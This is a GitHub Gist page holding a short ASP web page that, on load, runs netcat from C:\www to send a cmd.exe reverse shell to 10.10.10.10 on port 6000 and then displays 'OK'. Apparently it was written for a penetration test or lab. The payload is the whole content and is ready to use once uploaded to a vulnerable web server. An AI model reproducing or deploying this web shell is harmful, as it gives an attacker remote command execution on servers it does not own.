Skip to content

Instantly share code, notes, and snippets.

@int0x33
Created January 24, 2019 17:10
<%
Sub Page_Load
'1st test
Dim objShell : Set objShell = Server.CreateObject("Wscript.Shell")
objshell.Run("C:\www\nc.exe 10.10.10.10 6000 -e cmd")
End Sub
%>
<!DOCTYPE html>
<html>
<body>
<% Page_Load %>
<h3>OK</h3>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment